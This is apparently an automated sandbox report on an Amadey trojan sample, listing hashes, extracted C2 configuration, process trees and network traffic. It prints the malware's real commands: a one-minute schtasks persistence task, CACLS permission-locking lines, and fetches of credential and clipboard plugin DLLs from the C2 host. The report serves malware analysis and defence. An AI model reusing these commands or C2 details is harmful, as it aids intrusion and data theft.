amadey | b82e90eca661a98171d813b7d7d78dc1cb89dcb332c7e87fd828af4d98276762 | Triage

Analysis

max time kernel
146s
max time network
160s
platform
windows10-2004_x64
resource
win10v2004-20231020-en
resource tags

arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system
submitted
04/11/2023, 14:49 UTC

Sharing

Report Analysis Logs

General

Target

NEAS.7aac21870ff973c74a1a92726d843e40.exe
Size

221KB
MD5

7aac21870ff973c74a1a92726d843e40
SHA1

bc53dbd0f4f53d22fef19eb5bf3399f9c2f95995
SHA256

b82e90eca661a98171d813b7d7d78dc1cb89dcb332c7e87fd828af4d98276762
SHA512

75aecbb851961553b07adb4d22f78485e000506e6f3be1695ba2d42cc264f6331a17926851dd404b92a6653f30abb75fdce1751a32cb2a3de3aeb7935be48a93
SSDEEP

6144:DEPAc72ss5pKL93yMax7pH3F2d1ugMeSWp:DE32xpoaxBFg1ugMeS

Score

10^/10

amadey trojan

Malware Config

Extracted

Family

amadey

Version

3.89

C2

http://77.91.124.1/theme/index.php

Attributes

install_dir
fefffe8cea
install_file
explothe.exe
strings_key
36a96139c1118a354edf72b1080d4b2f

rc4.plain

1
006700e5a2ab05704bbb0c589b88924d

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\Control Panel\International\Geo\Nation	NEAS.7aac21870ff973c74a1a92726d843e40.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\Control Panel\International\Geo\Nation	explothe.exe

Executes dropped EXE 3 IoCs

pid	Process
2480	explothe.exe
2260	explothe.exe
2216	explothe.exe

Loads dropped DLL 1 IoCs

pid	Process
4480	rundll32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

Scheduled Task/Job

pid	Process
4068	schtasks.exe

Suspicious use of WriteProcessMemory 30 IoCs

description	pid	Process	procid_target
PID 2252 wrote to memory of 2480	2252	NEAS.7aac21870ff973c74a1a92726d843e40.exe	91
PID 2252 wrote to memory of 2480	2252	NEAS.7aac21870ff973c74a1a92726d843e40.exe	91
PID 2252 wrote to memory of 2480	2252	NEAS.7aac21870ff973c74a1a92726d843e40.exe	91
PID 2480 wrote to memory of 4068	2480	explothe.exe	92
PID 2480 wrote to memory of 4068	2480	explothe.exe	92
PID 2480 wrote to memory of 4068	2480	explothe.exe	92
PID 2480 wrote to memory of 3852	2480	explothe.exe	94
PID 2480 wrote to memory of 3852	2480	explothe.exe	94
PID 2480 wrote to memory of 3852	2480	explothe.exe	94
PID 3852 wrote to memory of 4832	3852	cmd.exe	96
PID 3852 wrote to memory of 4832	3852	cmd.exe	96
PID 3852 wrote to memory of 4832	3852	cmd.exe	96
PID 3852 wrote to memory of 1416	3852	cmd.exe	97
PID 3852 wrote to memory of 1416	3852	cmd.exe	97
PID 3852 wrote to memory of 1416	3852	cmd.exe	97
PID 3852 wrote to memory of 2924	3852	cmd.exe	98
PID 3852 wrote to memory of 2924	3852	cmd.exe	98
PID 3852 wrote to memory of 2924	3852	cmd.exe	98
PID 3852 wrote to memory of 2032	3852	cmd.exe	99
PID 3852 wrote to memory of 2032	3852	cmd.exe	99
PID 3852 wrote to memory of 2032	3852	cmd.exe	99
PID 3852 wrote to memory of 2536	3852	cmd.exe	100
PID 3852 wrote to memory of 2536	3852	cmd.exe	100
PID 3852 wrote to memory of 2536	3852	cmd.exe	100
PID 3852 wrote to memory of 3568	3852	cmd.exe	101
PID 3852 wrote to memory of 3568	3852	cmd.exe	101
PID 3852 wrote to memory of 3568	3852	cmd.exe	101
PID 2480 wrote to memory of 4480	2480	explothe.exe	118
PID 2480 wrote to memory of 4480	2480	explothe.exe	118
PID 2480 wrote to memory of 4480	2480	explothe.exe	118

C:\Users\Admin\AppData\Local\Temp\NEAS.7aac21870ff973c74a1a92726d843e40.exe
"C:\Users\Admin\AppData\Local\Temp\NEAS.7aac21870ff973c74a1a92726d843e40.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2252
- C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
  "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2480
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
    3⤵
    - Creates scheduled task(s)
    PID:4068
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3852
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      4⤵
      PID:4832
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "explothe.exe" /P "Admin:N"
      4⤵
      PID:1416
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "explothe.exe" /P "Admin:R" /E
      4⤵
      PID:2924
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      4⤵
      PID:2032
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "..\fefffe8cea" /P "Admin:N"
      4⤵
      PID:2536
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "..\fefffe8cea" /P "Admin:R" /E
      4⤵
      PID:3568
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
    3⤵
    - Loads dropped DLL
    PID:4480

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
- Executes dropped EXE
PID:2260

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
- Executes dropped EXE
PID:2216

Network

DNS

g.bing.com

Remote address:

8.8.8.8:53

Request

g.bing.com

IN A

Response

g.bing.com

IN CNAME

g-bing-com.a-0001.a-msedge.net

g-bing-com.a-0001.a-msedge.net

IN CNAME

dual-a-0001.a-msedge.net

dual-a-0001.a-msedge.net

IN A

204.79.197.200

dual-a-0001.a-msedge.net

IN A

13.107.21.200
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=1945c41ed0f441f09fc6d19c8c73bac5&localId=w:56AADF6C-A9F1-51D5-D90B-49C34B04170D&deviceId=6966556070062247&anid=

Remote address:

204.79.197.200:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=1945c41ed0f441f09fc6d19c8c73bac5&localId=w:56AADF6C-A9F1-51D5-D90B-49C34B04170D&deviceId=6966556070062247&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=32BB69C416EC6FF8146D7A7B17A46E63; domain=.bing.com; expires=Thu, 28-Nov-2024 14:50:31 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 873567DC1977485EAA4F93223E59C306 Ref B: BRU30EDGE0917 Ref C: 2023-11-04T14:50:31Z
date: Sat, 04 Nov 2023 14:50:31 GMT
GET

https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=1945c41ed0f441f09fc6d19c8c73bac5&localId=w:56AADF6C-A9F1-51D5-D90B-49C34B04170D&deviceId=6966556070062247&anid=

Remote address:

204.79.197.200:443

Request

GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=1945c41ed0f441f09fc6d19c8c73bac5&localId=w:56AADF6C-A9F1-51D5-D90B-49C34B04170D&deviceId=6966556070062247&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=32BB69C416EC6FF8146D7A7B17A46E63

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 5E1A2E142C4A47BABEE5B3FF4E1E3794 Ref B: BRU30EDGE0917 Ref C: 2023-11-04T14:50:32Z
date: Sat, 04 Nov 2023 14:50:31 GMT
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=1945c41ed0f441f09fc6d19c8c73bac5&localId=w:56AADF6C-A9F1-51D5-D90B-49C34B04170D&deviceId=6966556070062247&anid=

Remote address:

204.79.197.200:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=1945c41ed0f441f09fc6d19c8c73bac5&localId=w:56AADF6C-A9F1-51D5-D90B-49C34B04170D&deviceId=6966556070062247&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=32BB69C416EC6FF8146D7A7B17A46E63

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: E1122A6B55D341B1875CC8C4B4EFACEE Ref B: BRU30EDGE0917 Ref C: 2023-11-04T14:50:32Z
date: Sat, 04 Nov 2023 14:50:31 GMT
DNS

163.252.72.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

163.252.72.23.in-addr.arpa

IN PTR

Response

163.252.72.23.in-addr.arpa

IN PTR

a23-72-252-163deploystaticakamaitechnologiescom
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

241.154.82.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

241.154.82.20.in-addr.arpa

IN PTR

Response
DNS

157.123.68.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

157.123.68.40.in-addr.arpa

IN PTR

Response
DNS

18.31.95.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

18.31.95.13.in-addr.arpa

IN PTR

Response
DNS

59.128.231.4.in-addr.arpa

Remote address:

8.8.8.8:53

Request

59.128.231.4.in-addr.arpa

IN PTR

Response
DNS

218.240.110.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

218.240.110.104.in-addr.arpa

IN PTR

Response

218.240.110.104.in-addr.arpa

IN PTR

a104-110-240-218deploystaticakamaitechnologiescom
POST

http://77.91.124.1/theme/index.php

explothe.exe

Remote address:

77.91.124.1:80

Request

POST /theme/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.124.1
Content-Length: 89
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 04 Nov 2023 14:50:34 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 6
Content-Type: text/html; charset=UTF-8
DNS

198.1.85.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

198.1.85.104.in-addr.arpa

IN PTR

Response

198.1.85.104.in-addr.arpa

IN PTR

a104-85-1-198deploystaticakamaitechnologiescom
DNS

1.124.91.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.124.91.77.in-addr.arpa

IN PTR

Response

1.124.91.77.in-addr.arpa

IN PTR
DNS

tse1.mm.bing.net

Remote address:

8.8.8.8:53

Request

tse1.mm.bing.net

IN A

Response

tse1.mm.bing.net

IN CNAME

mm-mm.bing.net.trafficmanager.net

mm-mm.bing.net.trafficmanager.net

IN CNAME

dual-a-0001.a-msedge.net

dual-a-0001.a-msedge.net

IN A

204.79.197.200

dual-a-0001.a-msedge.net

IN A

13.107.21.200
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301044_1R6E1MOEVCAUYY73I&pid=21.2&w=1920&h=1080&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301044_1R6E1MOEVCAUYY73I&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 382840
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: D62F3889034446EEBD4575BE52F08BD1 Ref B: BRU30EDGE0611 Ref C: 2023-11-04T14:51:17Z
date: Sat, 04 Nov 2023 14:51:17 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301040_1IYHHZNUS5XGPHJUX&pid=21.2&w=1920&h=1080&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301040_1IYHHZNUS5XGPHJUX&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 362082
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 9DD30F3910ED446E9E4ABBE8E139FDC0 Ref B: BRU30EDGE0611 Ref C: 2023-11-04T14:51:17Z
date: Sat, 04 Nov 2023 14:51:17 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301089_12P1IUF340624Y74G&pid=21.2&w=1920&h=1080&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301089_12P1IUF340624Y74G&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 178602
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 2635ADD40417496B97ACCA72B9413D7C Ref B: BRU30EDGE0611 Ref C: 2023-11-04T14:51:17Z
date: Sat, 04 Nov 2023 14:51:17 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301477_14PVM3YMRTCSD2NZ8&pid=21.2&w=1080&h=1920&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301477_14PVM3YMRTCSD2NZ8&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 446334
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 8ABEED9FC5B6405F804A74F46B57EC61 Ref B: BRU30EDGE0611 Ref C: 2023-11-04T14:51:17Z
date: Sat, 04 Nov 2023 14:51:17 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301522_1ZWMJ9IP2OLOHI7JV&pid=21.2&w=1080&h=1920&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301522_1ZWMJ9IP2OLOHI7JV&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 370166
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 88E3FD89BE374CCD86249FF824BF7A5C Ref B: BRU30EDGE0611 Ref C: 2023-11-04T14:51:17Z
date: Sat, 04 Nov 2023 14:51:17 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301473_1HBSI9G0ABXR5GSDS&pid=21.2&w=1080&h=1920&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301473_1HBSI9G0ABXR5GSDS&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 155102
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: FA54868A8C2446B1AC7AFD1097B1B5D9 Ref B: BRU30EDGE0611 Ref C: 2023-11-04T14:51:18Z
date: Sat, 04 Nov 2023 14:51:18 GMT
DNS

55.36.223.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

55.36.223.20.in-addr.arpa

IN PTR

Response
GET

http://77.91.124.1/theme/Plugins/cred64.dll

explothe.exe

Remote address:

77.91.124.1:80

Request

GET /theme/Plugins/cred64.dll HTTP/1.1
Host: 77.91.124.1

Response

HTTP/1.1 404 Not Found

Date: Sat, 04 Nov 2023 14:51:24 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 273
Content-Type: text/html; charset=iso-8859-1
GET

http://77.91.124.1/theme/Plugins/clip64.dll

explothe.exe

Remote address:

77.91.124.1:80

Request

GET /theme/Plugins/clip64.dll HTTP/1.1
Host: 77.91.124.1

Response

HTTP/1.1 200 OK

Date: Sat, 04 Nov 2023 14:51:24 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 30 Sep 2023 10:50:50 GMT
ETag: "16400-60691507c5cc0"
Accept-Ranges: bytes
Content-Length: 91136
Content-Type: application/x-msdos-program
DNS

13.227.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

13.227.111.52.in-addr.arpa

IN PTR

Response
DNS

126.177.238.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

126.177.238.8.in-addr.arpa

IN PTR

Response
DNS

88.16.208.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

88.16.208.104.in-addr.arpa

IN PTR

Response

204.79.197.200:443

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=1945c41ed0f441f09fc6d19c8c73bac5&localId=w:56AADF6C-A9F1-51D5-D90B-49C34B04170D&deviceId=6966556070062247&anid=

tls, http2

1.9kB
9.3kB
21
18

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=1945c41ed0f441f09fc6d19c8c73bac5&localId=w:56AADF6C-A9F1-51D5-D90B-49C34B04170D&deviceId=6966556070062247&anid=

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=1945c41ed0f441f09fc6d19c8c73bac5&localId=w:56AADF6C-A9F1-51D5-D90B-49C34B04170D&deviceId=6966556070062247&anid=

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=1945c41ed0f441f09fc6d19c8c73bac5&localId=w:56AADF6C-A9F1-51D5-D90B-49C34B04170D&deviceId=6966556070062247&anid=

HTTP Response

204
77.91.124.1:80

http://77.91.124.1/theme/index.php

http

explothe.exe

512 B
365 B
6
5

HTTP Request

POST http://77.91.124.1/theme/index.php

HTTP Response

200
52.111.229.19:443

322 B
7
204.79.197.200:443

https://tse1.mm.bing.net/th?id=OADD2.10239317301473_1HBSI9G0ABXR5GSDS&pid=21.2&w=1080&h=1920&c=4

tls, http2

75.4kB
2.0MB
1451
1448

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301044_1R6E1MOEVCAUYY73I&pid=21.2&w=1920&h=1080&c=4

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301040_1IYHHZNUS5XGPHJUX&pid=21.2&w=1920&h=1080&c=4

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301089_12P1IUF340624Y74G&pid=21.2&w=1920&h=1080&c=4

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301477_14PVM3YMRTCSD2NZ8&pid=21.2&w=1080&h=1920&c=4

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301522_1ZWMJ9IP2OLOHI7JV&pid=21.2&w=1080&h=1920&c=4

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301473_1HBSI9G0ABXR5GSDS&pid=21.2&w=1080&h=1920&c=4

HTTP Response

200
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.2kB
8.2kB
16
13
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.2kB
8.3kB
16
14
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.2kB
8.3kB
16
14
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.2kB
8.3kB
16
14
77.91.124.1:80

http://77.91.124.1/theme/Plugins/clip64.dll

http

explothe.exe

4.4kB
101.8kB
80
79

HTTP Request

GET http://77.91.124.1/theme/Plugins/cred64.dll

HTTP Response

404

HTTP Request

GET http://77.91.124.1/theme/Plugins/clip64.dll

HTTP Response

200

8.8.8.8:53

g.bing.com

dns

56 B
158 B
1
1

DNS Request

g.bing.com

DNS Response

204.79.197.200

13.107.21.200
8.8.8.8:53

163.252.72.23.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

163.252.72.23.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

241.154.82.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

241.154.82.20.in-addr.arpa
8.8.8.8:53

157.123.68.40.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

157.123.68.40.in-addr.arpa
8.8.8.8:53

18.31.95.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

18.31.95.13.in-addr.arpa
8.8.8.8:53

59.128.231.4.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

59.128.231.4.in-addr.arpa
8.8.8.8:53

218.240.110.104.in-addr.arpa

dns

74 B
141 B
1
1

DNS Request

218.240.110.104.in-addr.arpa
8.8.8.8:53

198.1.85.104.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

198.1.85.104.in-addr.arpa
8.8.8.8:53

1.124.91.77.in-addr.arpa

dns

70 B
83 B
1
1

DNS Request

1.124.91.77.in-addr.arpa
8.8.8.8:53

tse1.mm.bing.net

dns

62 B
173 B
1
1

DNS Request

tse1.mm.bing.net

DNS Response

204.79.197.200

13.107.21.200
8.8.8.8:53

55.36.223.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

55.36.223.20.in-addr.arpa
8.8.8.8:53

13.227.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

13.227.111.52.in-addr.arpa
8.8.8.8:53

126.177.238.8.in-addr.arpa

dns

72 B
126 B
1
1

DNS Request

126.177.238.8.in-addr.arpa
8.8.8.8:53

88.16.208.104.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

88.16.208.104.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Persistence

Scheduled Task/Job

Privilege Escalation

Scheduled Task/Job

Defense Evasion

Credential Access

Discovery

Query Registry

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

Filesize
221KB

MD5
7aac21870ff973c74a1a92726d843e40

SHA1
bc53dbd0f4f53d22fef19eb5bf3399f9c2f95995

SHA256
b82e90eca661a98171d813b7d7d78dc1cb89dcb332c7e87fd828af4d98276762

SHA512
